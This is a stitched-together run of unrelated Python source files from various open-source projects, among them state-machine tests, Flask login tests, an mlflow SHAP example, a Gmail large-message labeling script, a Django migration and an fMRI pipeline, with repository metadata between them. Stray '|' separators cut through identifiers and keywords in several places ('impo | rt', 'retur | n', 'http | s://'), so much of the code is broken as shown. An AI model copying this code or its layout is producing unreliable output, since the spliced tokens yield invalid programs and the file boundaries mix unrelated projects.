def test_next_fn():
class _TM(StateMachine):
@state(first=True)
def first_state(self):
self.next_state(self.second_state)
@state
def second_state(self):
self.done()
sm = _TM()
setup_tunables(sm, "cname")
sm.engage()
assert sm.current_state == "first_state"
sm.execute()
assert sm.current_state == "second_state"
sm.engage()
sm.execute()
assert sm.current_state == ""
def test_next_fn2(wpitime):
class _TM(StateMachine):
@state
def second_state(self):
pass
@timed_state(first=True, duration=0.1, next_state=second_state)
def first_state(self):
pass
sm = _TM()
setup_tunables(sm, "cname")
sm.engage()
sm.execute()
assert sm.current_state == "first_state"
assert sm.is_executing
wpitime.step(0.5)
sm.engage()
sm.execute()
assert sm.current_state == "second_state"
assert sm.is_executing
sm.execute()
assert sm.current_state == ""
assert not sm.is_executing
def test_mixup():
from robotpy_ext.autonomous import state as _ext_state
from robotpy_ext.autonomous import timed_state as _ext_timed_state
with pytest.raises(RuntimeError) as exc_info:
class _SM1(StateMachine):
@_ext_state(first=True)
def the_state(self):
pass
assert isinstance(exc_info.value.__cause__, TypeError)
with pytest.raises(RuntimeError) as exc_info:
class _SM2(StateMachine):
@_ext_timed_state(first=True, duration=1)
def the_state(self):
pass
assert isinstance(exc_info.value.__cause__, TypeError |
ashishb/python_dep_generator | setup.py | Python | mit | 604 | 0.019868 | from setuptools import setup
setup(name='python_dep_generator',
version='0.1',
description='Generates python code dependency graph',
url='http | s://github.com/ashishb/python_dep_generator',
author='Ashish Bhatia',
author_email='ashishbhatia.ab@gmail.com',
license='MIT',
packages=['python_dep_generator'],
# install_requires=['argparse', 'importlib', 'inspect', 'logging', 'sys'] | ,
entry_points = {
'console_scripts': ['generate-dep=python_dep_generator.generate_dep:main'],
},
zip_safe=False)
|
kdheepak89/power-grid-helper | tests/test_functional.py | Python | bsd-3-clause | 4,009 | 0.000249 | # -*- coding: utf-8 -*-
"""Functional tests using WebTest.
See: http://webtest.readthedocs.org/
"""
from flask import url_for
from power_grid_helper.user.models import User
from .factories import UserFactory
class TestLoggingIn:
"""Login."""
def test_can_log_in_returns_200(self, user, testapp):
"""Login successful."""
# Goes to homepage
res = testapp.get('/')
# Fills out login form in navbar
form = res.forms['loginForm']
form['username'] = user.username
form['password'] = 'myprecious'
# Submits
res = form.submit().follow()
assert res.status_code == 200
def test_sees_alert_on_log_out(self, user, testapp):
"""Show alert on logout."""
res = testapp.get('/')
# Fills out login form in navbar
form = res.forms['loginForm']
form['username'] = user.username
form['password'] = 'myprecious'
# Submits
res = form.submit().follow()
res = testapp.get(url_for('public.logout')).follow()
# sees alert
assert 'You are logged out.' in res
def test_sees_error_message_if_password_is_incorrect(self, user, testapp):
"""Show error if password is incorrect."""
# Goes to homepage
res = testapp.get('/')
# Fills out login form, password incorrect
form = res.forms['loginForm']
form['username'] = user.username
form['password'] = 'wrong'
# Submits
res = form.submit()
# sees error
assert 'Invalid password' in res
def test_sees_error_message_if_username_doesnt_exist(self, user, testapp):
"""Show error if username doesn't exist."""
# Goes to homepage
res = testapp.get('/')
# Fills out login form, password incorrect
form = res.forms['loginForm']
form['username'] = 'unknown'
form['password'] = 'myprecious'
# Submits
res = form.submit()
# sees error
assert 'Unknown user' in res
class TestRegistering:
"""Register a user."""
def test_can_register(self, user, testapp):
"""Register a new user."""
old_count = len(User.query.all())
# Goes to homepage
res = testapp.get('/')
# Clicks Create Account button
res = res.click('Create account')
# Fills out the form
form = res.forms['registerForm']
form['username'] = 'foobar'
form['email'] = 'foo@bar. | com'
form['password'] = 'secret'
form['confirm'] = 'secret'
# Submits
res = form.submit().follow()
assert res.status_ | code == 200
# A new user was created
assert len(User.query.all()) == old_count + 1
def test_sees_error_message_if_passwords_dont_match(self, user, testapp):
"""Show error if passwords don't match."""
# Goes to registration page
res = testapp.get(url_for('public.register'))
# Fills out form, but passwords don't match
form = res.forms['registerForm']
form['username'] = 'foobar'
form['email'] = 'foo@bar.com'
form['password'] = 'secret'
form['confirm'] = 'secrets'
# Submits
res = form.submit()
# sees error message
assert 'Passwords must match' in res
def test_sees_error_message_if_user_already_registered(self, user, testapp):
"""Show error if user already registered."""
user = UserFactory(active=True) # A registered user
user.save()
# Goes to registration page
res = testapp.get(url_for('public.register'))
# Fills out form, but username is already registered
form = res.forms['registerForm']
form['username'] = user.username
form['email'] = 'foo@bar.com'
form['password'] = 'secret'
form['confirm'] = 'secret'
# Submits
res = form.submit()
# sees error
assert 'Username already registered' in res
|
pculture/unisubs | utils/one_time_data.py | Python | agpl-3.0 | 1,410 | 0.004255 | # Amara, universalsubtitles.org
#
# Copyright (C) 2017 Participatory Culture Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see
# http://www.gnu.org/licenses/agpl-3.0.html.
import uuid
from django.conf import settings
from django.core.cache import cache
from django.urls impo | rt reverse
def _mk_key(token):
return "one-time-data-" + token
def set_one_time_data(data):
token = str(uuid.uuid4())
key = _mk_key(token)
cache.set(key, data, 60)
retur | n '{}://{}{}'.format(settings.DEFAULT_PROTOCOL,
settings.HOSTNAME,
reverse("one_time_url", kwargs={"token": token}))
def get_one_time_data(token):
key = _mk_key(token)
data = cache.get(key)
# It seems like Brightcove wants to hit it twice
# cache.delete(key)
return data
|
mlflow/mlflow | examples/shap/multiclass_classification.py | Python | apache-2.0 | 964 | 0.002075 | import os
import numpy as np
from sklearn.datasets import load_iris
from sklearn.ensemble import RandomForestClassifier
import shap
import mlflow
# prepare training data
X, y = load_iris(return_X_y=True, as_frame=True)
# train a model
model = RandomForestClassifier()
model.fit(X, y)
# log an explanation
with mlflow.start_run() as run:
mlflow.shap.log_explanation(model.predict_pr | oba, X)
# list artifacts
client = mlflow.tracking.MlflowClient()
artifact_path = "model_explanations_shap"
artifacts = [x.path for x in client.list_artifacts(run.info.run_id, artifact_path)]
print("# artifacts:")
print(artifacts)
# load back the logged explanation
dst_path = client.download_artifacts(run.info.run_id, artifact_path)
base_va | lues = np.load(os.path.join(dst_path, "base_values.npy"))
shap_values = np.load(os.path.join(dst_path, "shap_values.npy"))
# show a force plot
shap.force_plot(base_values[0], shap_values[0, 0, :], X.iloc[0, :], matplotlib=True)
|
sdispater/tomlkit | tests/test_write.py | Python | mit | 437 | 0 | from tomlkit import dumps
from tomlkit import loads
def test_write_backslash():
| d = {"foo": | "\\e\u25E6\r"}
expected = """foo = "\\\\e\u25E6\\r"
"""
assert expected == dumps(d)
assert loads(dumps(d))["foo"] == "\\e\u25E6\r"
def test_escape_special_characters_in_key():
d = {"foo\nbar": "baz"}
expected = '"foo\\nbar" = "baz"\n'
assert expected == dumps(d)
assert loads(dumps(d))["foo\nbar"] == "baz"
|
euhackathon/commission-today-api | backend/backend/migrations/0006_auto_20141203_0021.py | Python | mit | 1,218 | 0 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('backend', '0005_organization_registered'),
]
operations = [
migrations.RemoveField(
model_name='organization',
name='lobbyists_with_access',
),
migrations.AlterField(
model_name='organization',
name='explore_url',
field=models.CharField(max_length=128, blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='organization',
name='lobbyists',
field=models.IntegerField(null=True, blank=True),
preserve_default=True,
),
migrations.AlterField(
model_name='organization',
name='money',
field=models.IntegerField(null=True, bl | ank=True),
preserve_default=True,
| ),
migrations.AlterField(
model_name='organization',
name='name',
field=models.CharField(max_length=128, null=True, blank=True),
preserve_default=True,
),
]
|
praus/Label-Big-Mail | big_mail_labeler.py | Python | mit | 3,890 | 0.006684 | #!/usr/bin/env python
import argparse
import email
import bisect
try:
from imapclient import IMAPClient
except ImportError:
import sys
print >>sys.stderr, """This script requires IMAPClient, a convenient Python IMAP library.
http://imapclient.freshfoo.com/
You can install it using PyPI:
(sudo) pip install imapclient
or EasyInstall:
(sudo) easy_install IMAPClient
"""
sys.exit(1)
parser = argparse.ArgumentParser(description='Big Mail Labeler')
parser.add_argument('username', action="store", help='IMAP username.')
parser.add_argument('-t', '--threshold', action="store", dest="threshold", default=2*1024**2, type=int,
help="What constitutes big message, messages bigger than this will be labeled. Units are in bytes, default is 2MB (default: %(default)s)")
parser.add_argument('--print', action="store_true", dest="print_msgs", default=False,
help='Prints the big messages. (default: %(default)s)')
parser.add_argument('--no-label', action="store_true", dest="no_label", default=False,
help='Disable labeling of messages. Just print them. (default: %(default)s)')
parser.add_argument('-p', '--password', action="store", dest="password",
help='IMAP password, if you leave this out, you\'ll be asked by getpass instead.')
parser.add_argument('-l', '--label', action="store", dest="label", default="Big",
help='Name of the "big message" label. (default: %(default)s)')
parser.add_argument('-f', '--folder', action="store", dest="folder", default='[Gmail]/All Mail',
help='IMAP folder to scan. This should ideally contain all messages, like gmail\'s All Mail. (default: %(default)s)')
parser.add_argument('-s', '--server', action="store", dest="host", default="imap.gmail.com",
help='IMAP server name (default: %(default)s)')
parser.add_argument('--nossl', action="store_false", dest="ssl", default=True,
help='Do not connect using SSL. (default: %(default)s)')
options = parser.parse_args()
if not options.password:
import getpass
options.password = getpass.getpass("Please enter your IMAP password: ")
server = IMAPClient(options.host, ssl=options.ssl, use_uid=True)
print server.login(options.username, options.password)
select_info = server.select_folder(options.folder)
print '%d messages in IMAP folder %s' % (select_info['EXISTS'], options.folder)
print "Fetching message metadata"
messages = server.search(['NOT DELETED'])
response = server.fetch(messages, ['RFC822.HEADER', 'RFC822.SIZE', 'INTERNALDATE'])
print "Messages fetched, sorting..."
by_size = sorted(list(response.viewitems()), key=lambda m: m[1]['RFC822.SIZE'])
sizes = [ m[1]['RFC822.SIZE'] for m in by_size ]
# select msgs that are bigger than threshold
bigger = bisect.bisect_right(sizes, options.threshold) # index of the first message bigger than threshold
big_messages = by_size[bigger:]
print "There are %d messages bigger than %s" % (len(big_messages), options.thresh | old)
big_uids = [ msg[0] for msg in big_messages ]
def print_messages():
print "\n--- Messages bigger than {}: ".format(options.threshold).ljust(80, '-')
print "Format: <date> | <size> | <from> | <subject>"
for msgid, data in big_messages:
headers = email.message_from_string(data['RFC822.HEADER'])
size = data['RFC822.SIZE']
date = data['INTERNALDATE']
print "{} | {} | {} | {}".format(date, size, headers['from'], headers['subject'])
if not options.no | _label:
print "Labeling big messages with label %s" % options.label
server.create_folder(options.label)
server.copy(big_uids, options.label)
print "Your messages larger than {} bytes have been labeled with label {}".format(options.threshold, options.label)
if options.print_msgs or options.no_label:
print_messages()
|
ridgek/shunter | tests/test_application.py | Python | bsd-3-clause | 1,174 | 0.000852 | from StringIO import StringIO
import unittest
from shunter.request import HTTPRequest
import mockapp
class TestApplication(unittest.TestCase):
def setUp(self):
self.app = mockapp.application
def test_get_response(self):
request = HTTPRequest({'REQUEST_METHOD': 'GET',
| 'PATH_INFO | ': '',
'Content-Type': 'text/plain'})
response = self.app.get_response(request)
self.assertEqual(response.content.read(), 'Hello World!')
self.assertEqual(response.status, 200)
request = HTTPRequest({'REQUEST_METHOD': 'GET',
'PATH_INFO': 'not/a/path',
'Content-Type': 'text/plain'})
response = self.app.get_response(request)
self.assertEqual(response.status, 404)
request = HTTPRequest({'REQUEST_METHOD': 'GET',
'PATH_INFO': 'broken',
'Content-Type': 'text/plain',
'wsgi.errors': StringIO()})
response = self.app.get_response(request)
self.assertEqual(response.status, 500)
|
l33tdaima/l33tdaima | pr1662e/array_strings_are_equal.py | Python | mit | 950 | 0.002105 | from typing import List
class Solution:
def arrayStringsAreEqualV1(self, word1: List[str], word2: List[str]) -> bool:
return "".join(word1) == "".join(word2)
def arrayStringsAreEqualV2(self, word1: List[str], word2: List[str]) -> bool:
def generator(word: List[str]):
for s in word:
for c in s:
yield c
yield None
for c1, c2 in zip(generator(word1), generator(word2)):
if c1 != c2:
return False
return True
# TESTS
for word1, word2, expected in [
(["ab", "c"], ["a", "bc"], Tr | ue),
(["a", "cb"], ["ab", "c"], False),
(["abc", "d", "defg"], | ["abcddefg"], True),
]:
sol = Solution()
actual = sol.arrayStringsAreEqualV1(word1, word2)
print("Array strings", word1, "and", word2, "are equal ->", actual)
assert actual == expected
assert sol.arrayStringsAreEqualV1(word1, word2) == expected
|
Hackerfleet/hfos | isomer/hfos/core.py | Python | agpl-3.0 | 1,475 | 0 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
# HFOS - Hackerfleet Operating System
# ===================================
# Copyright (C) 2011-2019 Heiko 'riot' Weinen <riot@c-base.org> and others.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your | option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affe | ro General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
__author__ = "Heiko 'riot' Weinen"
__license__ = "AGPLv3"
"""
Module: HFOS Core
=================
"""
from isomer.component import ConfigurableComponent, handler
from isomer.database import objectmodels
from isomer.events.system import authorized_event
class HFOSCore(ConfigurableComponent):
"""
Hackerfleet Operating System core component
"""
channel = 'isomer-web'
configprops = {
}
def __init__(self, *args):
"""
Initialize the HFOS Core.
:param args:
"""
super(HFOSCore, self).__init__("HFOSCore", *args)
self.log("Started")
|
tomhsx/django-inventory | inventory/urls.py | Python | mit | 242 | 0 | from django.conf.urls import patterns, include, url
from django.contrib import a | dmin
admin.autodiscover()
urlpatterns = patterns(
'',
url(r'^$', 'inventory.views.home', name='home'),
| url(r'^admin/', include(admin.site.urls)),
)
|
TaskEvolution/Task-Coach-Evolution | taskcoach/taskcoachlib/thirdparty/src/reportlab/__init__.py | Python | gpl-3.0 | 1,715 | 0.00758 | #Copyright ReportLab Europe Ltd. 2000-2012
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/__init__.py
__version__=''' $Id$ '''
__doc__="""The Reportlab PDF generation library."""
Version = "2.7"
import sys
if sys.version_info[0:2] < (2, 7):
warning = """The trunk of reportlab currently requires Python 2.7 or higher.
This is being done to let us move forwards with 2.7/3.x compatibility
with the minimum of baggage.
ReportLab 2.7 was the last packaged ver | sion to suppo0rt Python 2.5 an | d 2.6.
Python 2.3 users may still use ReportLab 2.4 or any other bugfixes
derived from it, and Python 2.4 users may use ReportLab 2.5.
Python 2.2 and below need to use released versions beginning with
1.x (e.g. 1.21), or snapshots or checkouts from our 'version1' branch.
Our current plan is to remove Python 2.5 compatibility on our next release,
allowing us to use the 2to3 tool and work on Python 3.0 compatibility.
If you have a choice, Python 2.7.x is best long term version to use.
"""
raise ImportError("reportlab needs Python 2.5 or higher", warning)
def getStory(context):
"This is a helper for our old autogenerated documentation system"
if context.target == 'UserGuide':
# parse some local file
import os
myDir = os.path.split(__file__)[0]
import yaml
return yaml.parseFile(myDir + os.sep + 'mydocs.yaml')
else:
# this signals that it should revert to default processing
return None
def getMonitor():
import reportlab.monitor
mon = reportlab.monitor.ReportLabToolkitMonitor()
return mon
|
taejoonlab/taejoonlab-toolbox | PopGen/dominant_nucl.py | Python | gpl-3.0 | 2,301 | 0.010865 | #dominant
import os
folder = sys.argv[1]
def make_file_list(input_dir):
file_list = []
input_file_list = os.listdir | (input_dir)
for input_file in input_file_list:
if input_file[-8:] == '.cluster':
file_list.append(input | _file)
return file_list
file_list = make_file_list(folder)
for each_file in file_list:
with open(folder + each_file,'r') as f:
print each_file
clustername = each_file.replace('.cluster','')
sample = each_file.split('_')[1]
sample_name = each_file.split('.')[0]
uniq = open('dom_{}'.format(clustername),'w')
tmp_name = []
seq_dic = []
for line in f: #indel is not considered (hard to compare further)
if len(line.strip()) <171:
continue
name,seq = line.split()
if name.startswith('cluster'):
tmp_record = ''
if len(seq_dic)>1:
for i in range(len(seq_dic[1])):
tmp_seq = ''
for j in range(len(seq_dic)): #tmp_seq containt every nucleotide from same position of reads in one cluster
tmp_seq += seq_dic[j][i]
#record most frequently shown nucleotide as fasta format
max_base = max(tmp_seq.count('A'),tmp_seq.count('T'),tmp_seq.count('G'),tmp_seq.count('C'),tmp_seq.count('-'))
max_a = tmp_seq.count('A')
max_g = tmp_seq.count('G')
max_t = tmp_seq.count('T')
max_c = tmp_seq.count('C')
if max_base == max_a:
tmp_record += 'A'
elif max_base == max_g:
tmp_record += 'G'
elif max_base == max_t:
tmp_record += 'T'
elif max_base == max_c:
tmp_record += 'C'
if len(tmp_record) == 101:
uniq.write('>{}\n{}\n'.format(tmp_name[0].split('*')[0],tmp_record))
tmp_name = []
seq_dic = []
else:
tmp_name.append(name)
seq_dic.append(seq)
|
frouty/odoogoeen | extra-addons/aeroo/report_aeroo_sample/__init__.py | Python | agpl-3.0 | 1,534 | 0.000652 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2008-2011 Alistek Ltd (http://www.alistek.com) All Rights Reserved.
# General contacts <info@alistek.com>
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Sof | tware Foundation; either version 3
# of t | he License, or (at your option) any later version.
#
# This module is GPLv3 or newer and incompatible
# with OpenERP SA "AGPL + Private Use License"!
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
from .report import parser
|
rekka/intro-fortran-2016 | web/python/implicit_euler.py | Python | mit | 1,047 | 0.002865 | import math
import nu | mpy as np
import matplotlib
matplotlib.use('SVG')
import matplotlib.pyplot as plt
fig, ax = plt.subplots()
x1 = 2.
x = np.linspace(0, x1, 100)
ax.plot(x, np.exp(-5. * x), linewidth=2, label = '$x(t)$')
N = 4
h = x1 / N
sx = np.linspace(0, x1, N + 1)
sy = [(1 + 5. * h)**(-n) for n in range(N + 1)]
ax.plot(sx, sy, marker='.', markersize=10, label='$x_i$')
for i in range(1, N):
ax.plot(x, np.exp(-5. * x) * sy[i] / math.exp(-5. * sx[i]), '--')
ax.spines['right'].set_visible(False) |
ax.spines['top'].set_visible(False)
ax.spines['bottom'].set_bounds(0, x1)
plt.tick_params(
axis='y',
which='both',
left='on',
right='off',
labelleft='off')
ax.xaxis.set_ticks_position('bottom')
ax.set_xticks(sx)
ax.set_xticklabels(["$t_{}$".format(i) for i in range(N+1)])
ax.set_xlim((0 - 0.05, x1 + 0.05))
ax.set_ylim((-0.05, 1.1 * max(np.abs(sy))))
ax.set_ylabel('$x$', rotation=0)
ax.yaxis.set_label_coords(-0.025, 1.0)
ax.legend(frameon=False, loc='upper right')
plt.savefig('../img/implicit_euler.svg')
|
Pecacheu/Eagle2Kicad | Library/Library.py | Python | mit | 3,113 | 0.008352 | '''
Created on Apr 3, 2012
@author: Dan
'''
from Common.Converter import *
from Common.Module import *
from Common.Symbol import DevicePart
from Common.Device import Deviceset
class Library(object):
__slots__ = ("name", "modules", "symbols", "converter", "deviceparts")
def __init__(self, node, name, converter=None):
self.name = name
if converter is None:
converter = Converter()
symConverter = SchemConverter()
self.modules = []
self.deviceparts = []
devicesetsLst = []
symbolsHash = {}
packages = node.find("packages").findall("package")
if packages != None:
for package in packages:
self.modules.append(Module(package, converter))
devicesets = node.find("devicesets").findall("deviceset")
if devicesets != None:
for deviceset in devicesets:
ds = Deviceset(deviceset, symConverter)
devicesetsLst.append(ds)
symbols = node.find("symbols").findall("symbol")
if symbols != None and len(devicesetsLst) != 0: #strange if not?
for symbol in symbols:
sn = symbol.get("name")
if sn in symbolsHash:
print("The symbol with the same name %s already exists!" % sn)
els | e:
symbolsHash[sn] = symbol
for deviceset in devicesetsLs | t: #strange if not?
#just iterater over all posible device packages
for device in deviceset.getDevices():
#we have to create a number of symbols to match diffrent pin configurations
#the real name of device is <deviceset> name plus name of <device>
#symlink is just a scheme representation of the set of devices or devicessts
device.setFullName(deviceset.name)
dp = DevicePart(device, symbolsHash, deviceset.getGates(), symConverter)
self.deviceparts.append(dp)
def writeLibrary(self, modFile=None, symFile=None, docFile=None):
if modFile != None:
self.writeModFile(modFile)
if symFile != None:
self.writeSymFile(symFile)
if docFile != None: #not used at the moment
self.writeDocFile(docFile)
def writeModFile(self, modFile):
modFile.write("PCBNEW-LibModule-V1 00/00/0000-00:00:00\n")
modFile.write("$INDEX\n")
for module in self.modules:
modFile.write(module.package + "\n")
modFile.write("$EndINDEX\n")
for module in self.modules:
module.write(modFile)
modFile.write("$EndLIBRARY")
modFile.close()
def writeSymFile(self, symFile):
symFile.write("EESchema-LIBRARY Version 0.0 00/00/0000-00:00:00\n")
for devicepart in self.deviceparts:
devicepart.write(symFile)
symFile.write("# End Library")
def writeDocFile(self, docFile):
docFile.write("EESchema-DOCLIB Version 0.0 Date: 00/00/0000 00:00:00\n")
|
OCA/report-print-send | remote_report_to_printer/tests/__init__.py | Python | agpl-3.0 | 61 | 0 | from . import test_remote_print | er
from . import | test_printer
|
torchbox/django-modelcluster | modelcluster/forms.py | Python | bsd-3-clause | 16,632 | 0.003487 | from __future__ import unicode_literals
from django.forms import ValidationError
from django.core.exceptions import NON_FIELD_ERRORS
from django.forms.formsets import TOTAL_FORM_COUNT
from django.forms.models import (
BaseModelFormSet, modelformset_factory,
ModelForm, _get_foreign_key, ModelFormMetaclass, ModelFormOptions
)
from django.db.models.fields.related import ForeignObjectRel
from modelcluster.models import get_all_child_relations
class BaseTransientModelFormSet(BaseModelFormSet):
""" A ModelFormSet that doesn't assume that all its initial data instances exist in the db """
def _construct_form(self, i, **kwargs):
# Need to override _construct_form to avoid calling to_python on an empty string PK value
if self.is_bound and i < self.initial_form_count():
pk_key = "%s-%s" % (self.add_prefix(i), self.model._meta.pk.name)
pk = self.data[pk_key]
if pk == '':
kwargs['instance'] = self.model()
else:
pk_field = self.model._meta.pk
to_python = self._get_to_python(pk_field)
pk = to_python(pk)
kwargs['instance'] = self._existing_object(pk)
if i < self.initial_form_count() and 'instance' not in kwargs:
kwargs['instance'] = self.get_queryset()[i]
if i >= self.initial_form_count() and self.initial_extra:
# Set initial values for extra forms
try:
kwargs['initial'] = self.initial_extra[i - self.initial_form_count()]
except IndexError:
pass
# bypass BaseModelFormSet's own _construct_form
return super(BaseModelFormSet, self)._construct_form(i, **kwargs)
def save_existing_objects(self, commit=True):
# Need to override _construct_form so that it doesn't skip over initial forms whose instance
# has a blank PK (which is taken as an indication that the form was constructed with an
# instance not present in our queryset)
self.changed_objects = []
self.deleted_objects = []
if not self.initial_forms:
return []
saved_instances = []
forms_to_delete = self.deleted_forms
for form in self.initial_forms:
obj = form.instance
if form in forms_to_delete:
if obj.pk is None:
# no action to be taken to delete an object which isn't in the database
continue
self.deleted_objects.append(obj)
self.delete_existing(obj, commit=commit)
elif form.has_changed():
self.changed_objects.append((obj, form.changed_data))
saved_instances.append(self.save_existing(form, obj, commit=commit))
if not commit:
self.saved_forms.append(form)
return saved_instances
def transientmodelformset_factory(model, formset=BaseTransientModelFormSet, **kwargs):
return modelformset_factory(model, formset=formset, **kwargs)
class BaseChildFormSet(BaseTransientModelFormSet):
def __init__(self, data=None, files=None, instance=None, queryset=None, **kwargs):
if instance is None:
self.instance = self.fk.remote_field.model()
else:
self.instance = instance
self.rel_name = ForeignObjectRel(self.fk, self.fk.remote_field.model, related_name=self.fk.remote_field.related_name).get_accessor_name()
if queryset is None:
queryset = getattr(self.instance, self.rel_name).all()
super(BaseChildFormSet, self).__init__(data, files, queryset=queryset, **kwargs)
def save(self, commit=True):
# The base ModelFormSet's save(commit=False) will populate the lists
# self.changed_objects, self.deleted_objects and self.new_objects;
# use these to perform the appropriate updates on the relation's manager.
saved_instances = super(BaseChildFormSet, self).save(commit=False)
manager = getattr(self.instance, self.rel_name)
# if model has a sort_order_field defined, assign order indexes to the attribute
# named in it
if self.can_order and hasattr(self.model, 'sort_order_field'):
sort_order_field = getattr(self.model, 'sort_order_field')
for i, form in enumerate(self.ordered_forms):
setattr(form.instance, sort_order_field, i)
# If the manager has existing instances with a blank ID, we have no way of knowing
# whether these correspond to items in the submitted data. We'll assume that they do,
# as that's the most common case (i.e. the formset contains the full set of child objects,
# not just a selection of additions / updates) and so we delete all ID-less objects here
# on the basis that they will be re-added by the f | ormset saving mechanism.
no_id_instances = [obj for obj in manager.all() if obj.pk is None]
if no_id_instances:
manager.remove | (*no_id_instances)
manager.add(*saved_instances)
manager.remove(*self.deleted_objects)
self.save_m2m() # ensures any parental-m2m fields are saved.
if commit:
manager.commit()
return saved_instances
def clean(self, *args, **kwargs):
self.validate_unique()
return super(BaseChildFormSet, self).clean(*args, **kwargs)
def validate_unique(self):
'''This clean method will check for unique_together condition'''
# Collect unique_checks and to run from all the forms.
all_unique_checks = set()
all_date_checks = set()
forms_to_delete = self.deleted_forms
valid_forms = [form for form in self.forms if form.is_valid() and form not in forms_to_delete]
for form in valid_forms:
unique_checks, date_checks = form.instance._get_unique_checks()
all_unique_checks.update(unique_checks)
all_date_checks.update(date_checks)
errors = []
# Do each of the unique checks (unique and unique_together)
for uclass, unique_check in all_unique_checks:
seen_data = set()
for form in valid_forms:
# Get the data for the set of fields that must be unique among the forms.
row_data = (
field if field in self.unique_fields else form.cleaned_data[field]
for field in unique_check if field in form.cleaned_data
)
# Reduce Model instances to their primary key values
row_data = tuple(d._get_pk_val() if hasattr(d, '_get_pk_val') else d
for d in row_data)
if row_data and None not in row_data:
# if we've already seen it then we have a uniqueness failure
if row_data in seen_data:
# poke error messages into the right places and mark
# the form as invalid
errors.append(self.get_unique_error_message(unique_check))
form._errors[NON_FIELD_ERRORS] = self.error_class([self.get_form_error()])
# remove the data from the cleaned_data dict since it was invalid
for field in unique_check:
if field in form.cleaned_data:
del form.cleaned_data[field]
# mark the data as seen
seen_data.add(row_data)
if errors:
raise ValidationError(errors)
def childformset_factory(
parent_model, model, form=ModelForm,
formset=BaseChildFormSet, fk_name=None, fields=None, exclude=None,
extra=3, can_order=False, can_delete=True, max_num=None, validate_max=False,
formfield_callback=None, widgets=None, min_num=None, validate_min=False
):
fk = _get_foreign_key(parent_model, model, fk_name=fk_name)
# enforce a max_num=1 when the foreign key to the parent model is unique.
if fk.unique:
max_num = 1
validate_max = True
if exclude is N |
pearsonlab/nipype | examples/fmri_fsl_feeds.py | Python | bsd-3-clause | 5,653 | 0.00283 | #!/usr/bin/env python
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
=================
fMRI: FEEDS - FSL
=================
A pipeline example that data from the FSL FEEDS set. Single subject, two
stimuli.
You can find it at http://www.fmrib.ox.ac.uk/fsl/feeds/doc/index.html
"""
from __future__ import division
from builtins import range
import os # system functions
import nipype.interfaces.io as nio # Data i/o
import nipype.interfaces.fsl as fsl # fsl
import nipype.pipeline.engine as pe # pypeline engine
import nipype.algorithms.modelgen as model # model generation
from nipype.workflows.fmri.fsl import (create_featreg_preproc,
create_modelfit_workflow,
create_reg_workflow)
from nipype.interfaces.base import Bunch
"""
Preliminaries
-------------
Setup any package specific configuration. The output file format for FSL
routines is being set to compressed NIFTI.
"""
fsl.FSLCommand.set_default_output_type('NIFTI_GZ')
"""
Experiment specific components
------------------------------
This tutorial does a single subject analysis so we are not using infosource and
iterables
"""
# Specify the location of the FEEDS data. You can find it at http://www.fmrib.ox.ac.uk/fsl/feeds/doc/index.html
feeds_data_dir = os.path.abspath('feeds/data')
# Specify the subject directories
# Map field names to individual subject runs.
info = dict(func=[['fmri']],
struct=[['structural']])
"""
Now we create a :class:`nipype.interfaces.io.DataSource` object and fill in the
information from above abou | t the layout of | our data. The
:class:`nipype.pipeline.Node` module wraps the interface object and provides
additional housekeeping and pipeline specific functionality.
"""
datasource = pe.Node(interface=nio.DataGrabber(outfields=['func', 'struct']),
name='datasource')
datasource.inputs.base_directory = feeds_data_dir
datasource.inputs.template = '%s.nii.gz'
datasource.inputs.template_args = info
datasource.inputs.sort_filelist = True
preproc = create_featreg_preproc(whichvol='first')
TR = 3.
preproc.inputs.inputspec.fwhm = 5
preproc.inputs.inputspec.highpass = 100. / TR
modelspec = pe.Node(interface=model.SpecifyModel(),
name="modelspec")
modelspec.inputs.input_units = 'secs'
modelspec.inputs.time_repetition = TR
modelspec.inputs.high_pass_filter_cutoff = 100
modelspec.inputs.subject_info = [Bunch(conditions=['Visual', 'Auditory'],
onsets=[list(range(0, int(180 * TR), 60)), list(range(0, int(180 * TR), 90))],
durations=[[30], [45]],
amplitudes=None,
tmod=None,
pmod=None,
regressor_names=None,
regressors=None)]
modelfit = create_modelfit_workflow(f_contrasts=True)
modelfit.inputs.inputspec.interscan_interval = TR
modelfit.inputs.inputspec.model_serial_correlations = True
modelfit.inputs.inputspec.bases = {'dgamma': {'derivs': True}}
cont1 = ['Visual>Baseline', 'T', ['Visual', 'Auditory'], [1, 0]]
cont2 = ['Auditory>Baseline', 'T', ['Visual', 'Auditory'], [0, 1]]
cont3 = ['Task', 'F', [cont1, cont2]]
